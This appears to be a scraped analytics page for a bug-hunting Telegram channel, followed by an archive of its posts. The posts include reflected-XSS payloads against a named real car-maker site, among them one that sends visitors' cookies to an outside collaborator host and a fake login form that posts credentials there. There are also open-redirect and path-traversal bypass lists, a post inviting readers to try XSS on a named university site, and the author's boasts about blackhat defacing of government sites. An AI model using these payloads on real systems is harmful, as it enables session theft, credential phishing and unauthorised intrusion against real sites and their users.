en
Feedback
π™‡π™€π™¨π™©π™¨π™šπ™˜

π™‡π™€π™¨π™©π™¨π™šπ™˜

Open in Telegram

α΄›ΚœΙͺs α΄„Κœα΄€Ι΄Ι΄α΄‡ΚŸ Ιͺs α΄€ΚŸΚŸ α΄€Κ™α΄α΄œα΄› Bᴜɒ Κœα΄œΙ΄α΄›ΙͺΙ΄Ι’ οΉ  Cʏʙᴇʀsᴇᴄ οΉ  Eα΄›ΚœΙͺα΄„α΄€ΚŸ Hα΄€α΄„α΄‹ΙͺΙ΄Ι’ Κ€α΄‡ΚŸα΄€α΄›α΄‡α΄… ᴄᴏɴᴛᴇɴᴛs. any query msg me at @Coffinxp1Bot Youtube:https://youtube.com/@lostsecc IF you want to support ;) https://www.buymeacoffee.com/coffinxp

Show more

πŸ“ˆ Analytical overview of Telegram channel π™‡π™€π™¨π™©π™¨π™šπ™˜

Channel π™‡π™€π™¨π™©π™¨π™šπ™˜ (@lostsec) in the English language segment is an active participant. Currently, the community unites 15 943 subscribers, ranking 5 964 in the Technologies & Applications category and 35 527 in the India region.

πŸ“Š Audience metrics and dynamics

Since its creation on Π½Π΅Π²Ρ–Π΄ΠΎΠΌΠΎ, the project has demonstrated rapid growth, gathering an audience of 15 943 subscribers.

According to the latest data from 30 October, 2024, the channel demonstrates stable activity. Although there has been a change in the number of participants by 1 442 over the last 30 days and by 0 over the last 24 hours, overall reach remains high.

  • Verification status: Not verified
  • Engagement rate (ER): The average audience engagement rate is 33.86%. Within the first 24 hours after publication, content typically collects 18.68% reactions from the total number of subscribers.
  • Post reach: On average, each post receives 5 398 views. Within the first day, a publication typically gains 2 978 views.
  • Reactions and interaction: The audience actively supports content: the average number of reactions per post is 108.

πŸ“ Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
β€œα΄›ΚœΙͺs α΄„Κœα΄€Ι΄Ι΄α΄‡ΚŸ Ιͺs α΄€ΚŸΚŸ α΄€Κ™α΄α΄œα΄› Bᴜɒ Κœα΄œΙ΄α΄›ΙͺΙ΄Ι’ οΉ  Cʏʙᴇʀsᴇᴄ οΉ  Eα΄›ΚœΙͺα΄„α΄€ΚŸ Hα΄€α΄„α΄‹ΙͺΙ΄Ι’ Κ€α΄‡ΚŸα΄€α΄›α΄‡α΄… ᴄᴏɴᴛᴇɴᴛs. any query msg me at @Coffinxp1Bot Youtube:https://youtube.com/@lostsecc IF you want to support ;) https://www.buymeacoffee.com/coffinxp”

Thanks to the high frequency of updates (latest data received on 18 March, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

15 943
Subscribers
No data24 hours
+1727 days
+1 44230 days
Posts Archive
finally ghauri added -m switch

congratulations bro πŸŽ‰β€οΈ i impressed by this guy dedication.there is csp and waf's but in the end he was able to bypass all..
congratulations bro πŸŽ‰β€οΈ i impressed by this guy dedication.there is csp and waf's but in the end he was able to bypass all..

guys i renamed my new account to old one name coffinxp should i delete the old account now ?? or..

Finally my old account is back boiezzzz πŸ˜‰πŸ”₯ https://github.com/coffinxp

site: RXSS:https://www.landroverusa.com/search.html?searchterm=%3Cimg+src%3Dx%C2%A0+onerror%3Dprompt%28document.cookie%29%3E&
site: RXSS:https://www.landroverusa.com/search.html?searchterm=%3Cimg+src%3Dx%C2%A0+onerror%3Dprompt%28document.cookie%29%3E&page=1 <img src=x  onerror=prompt(document.cookie)> GET VICTIM COOKIE: <img src=x  onerror="document.location='http://fxgkqas72b1qmcx7v0qrtgv7fylp9uxj.oastify.com?c='+document.cookie;" /> PHISHING: <h3>Please login to proceed</h3> <form action=http://zgj49ubrlvka5wgrek9bc0eryi49s0io7.oastify.com>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br>

LOGIN AND COOKIE STEALING VIA XSS

For finding hidden parameter: arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m
For finding hidden parameter:
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10  --headers "User-Agent: Mozilla/5.0"

Hey,I love you all ❀️. Sometimes, as you know, it's not always possible to have a great day or provide top-notch content, but you still appreciate what I share and that made me happy. It doesn't matter if the content isn't always at the highest level sometimes I don't feel my best due to overthinking about the future or other reasons and busy in some other projects and things so i cant able to focus on one thing. Yet, I continue to share because I want to remain consistent in what I do and love.I've always wanted to do something unique and different from others; my mind doesn't settle for what everyone else does. During my college days, I earned certifications like CEH Master, CCNP, Red Hat, and more cybersec certs. After college, I worked as a SOC analyst, cybercrime investigator, and security analyst. However, I didn't stay in these roles for long because I wanted to learn more and gain experience in various fields thats why i left these. My passion for cybersecurity drives me to explore everything that excites me.I know that whatever I set my mind to, I can master quickly. in defacing or blackhat hackings i achived so much things in short time and also top rank in defacing for new experience and skills and leaening also for our country and some other country gov cyberspace and made a good friends with all other top countries top hackers and defacer or admins from indonessia,france,usa,china,uk,india,morocco,egypt etc.When it comes to bug hunting, I started when I created this Telegram channel. I'm not like the top hunters who have 5-10 years of experience, but I've caught up with them very fast in just a few months. People are mentioning me on Twitter Whenever someone posts about something, they show me so much love and mention me over others who have much more experience in this field.I want to say that I have many things to show you. I have skills in other areas that I love. My mind is so creative that I can't be comfortable in just one field. I don't know why, but in the future, you will see some high-level stuffβ€”maybe even you will see me in the news i just do some things privatellyβ€”if everything goes well and with your love and support ❀️ Thank you for being with me on this journey. Your support means the world to me, and I promise to continue pushing boundaries and bringing you unique and exciting content in bug hunting and cybersecurity field. Let's keep growing together!
ο»Ώ

you can try this effective manual openredirect Bypass: 1. Null-byte injection:    - /google.com%00/    - //google.com%00   2. Base64 encoding variations:    - aHR0cDovL2dvb2dsZS5jb20=    - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==    - //base64:d3d3Lmdvb2dsZS5jb20=/   3. Case-sensitive variations:    - //GOOGLE.com/    - //GoOgLe.com/ 4. Overlong UTF-8 sequences:    - %C0%AE%C0%AE%2F (overlong encoding for ../)    - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes:    - /%68%74%74%70://google.com    - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D    - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations:    - //google.com@127.0.0.1/    - //127.0.0.1.xip.io/    - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters:    - //google.com/#/    - //google.com/;&/    - //google.com/?id=123&// 8. Octal IP address format:    - http://0177.0.0.1/    - http://00177.0000.0000.0001/ 9. IP address variants:    - http://3232235777 (decimal notation of an IP)    - http://0xC0A80001 (hex notation of IP)    - http://192.168.1.1/ 10. Path traversal with encoding:     - /..%252f..%252f..%252fetc/passwd     - /%252e%252e/%252e%252e/%252e%252e/etc/passwd     - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion:     - ftp://google.com/     - javascript:alert(1)//google.com 12. Protocol-relative URLs:     - :////google.com/     - :///google.com/ 13. Redirection edge cases:     - //google.com/?q=//bing.com/     - //google.com?q=https://another-site.com/ 14. IPv6 notation:     - http://[::1]/     - http://[::ffff:192.168.1.1]/     15. Double URL encoding:     - %252f%252fgoogle.com (encoded twice)     - %255cgoogle.com 16. Combined traversal & encoding:     - /%2E%2E/%2E%2E/etc/passwd     - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based:     - https://google.com.reverselookup.com     - //lookup-reversed.google.com/ 18. Non-standard ports:     - http://google.com:81/     - https://google.com:444/ 19. Unicode obfuscation in paths:     - /%E2%80%8Egoogle.com/     - /%C2%A0google.com/ 20. Query parameters obfuscation:     - //google.com/?q=http://another-site.com/     - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo:     - https://admin:password@google.com/     - http://@google.com 22. Combination of userinfo and traversal:     - https://admin:password@google.com/../../etc/passwd

If you work hard, Treat yourself good.We are here for a good time, not a for a long time.

1lac+ messages 😳🀯this is how much i interact with you all till now πŸ”₯Damnnnnn 😢
1lac+ messages 😳🀯this is how much i interact with you all till now πŸ”₯Damnnnnn 😢

bambda.txt0.04 KB

try this burpsuite bambda it give u all possible vuln param with colourful output so you can easily test on that param its ch
try this burpsuite bambda it give u all possible vuln param with colourful output so you can easily test on that param its check same regex like in gf pattren very useful while using burpsuite.

i just treat ravageband as a testphp site always for my testing oneliner πŸ˜‚ but it works in all sites πŸ”₯

cool πŸ”₯i just randomly checking this site where i found ssrf before and now its finded xss πŸ˜‰ try it: https://www.somaiya.edu
cool πŸ”₯i just randomly checking this site where i found ssrf before and now its finded xss πŸ˜‰ try it: https://www.somaiya.edu

here we go :) πŸ˜‰

i made more simple now just run sh xss.sh or bash xss.sh it will ask you for website url just enter that and it will automatic test all urls and save in xss.txt file with all reflection urls with unfilter param and then just send that list file in lostxlso xss list option it will do all the job ❀️

sorry guys if your seeing ads its automatic someone notice this channel after 14k and now its showing...